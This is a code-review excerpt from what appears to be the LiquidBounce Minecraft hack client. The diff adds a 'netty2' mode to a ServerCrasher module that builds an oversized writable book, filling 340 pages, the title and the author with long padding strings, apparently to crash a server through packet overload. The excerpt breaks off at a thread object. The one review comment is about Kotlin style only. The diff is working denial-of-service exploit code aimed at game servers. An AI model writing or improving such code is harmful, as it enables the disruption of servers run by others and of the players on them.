shared/main/java/net/ccbluex/liquidbounce/features/module/modules/exploit/ServerCrasher.kt

```diff
@@ -89,6 +94,104 @@ class ServerCrasher : Module() {
+            }
+            "netty2" -> {
+                val size2 = "................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."
+
+                val book4 = classProvider.createItemStack(classProvider.getItemEnum(ItemType.WRITABLE_BOOK))
+                val author4 = "Netty$size2"
+
+                val tag4 = classProvider.createNBTTagCompound()
+                val list4 = classProvider.createNBTTagList()
+                for (i3 in 0..339) {
+                    val tString = classProvider.createNBTTagString(size2)
+                    list4.appendTag(tString)
+                }
+                tag4.setString("author", author4)
+                tag4.setString("title", size2)
+                tag4.setTag("pages", list4)
+                if (book4.tagCompound != null) {
+                    val tagb = book4.tagCompound
+                    tagb?.setTag("pages", list4)
+                } else {
+                    book4.setTagInfo("pages", list4)
+                }
+                println(book4.tagCompound.toString().toByteArray().size)
+
+                object : Thread() {
```

Comment:
It would be better to replace this with the [`thread` function that Kotlin provides](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin.concurrent/thread.html):
```suggestion
                thread() {
                    ...
                }
```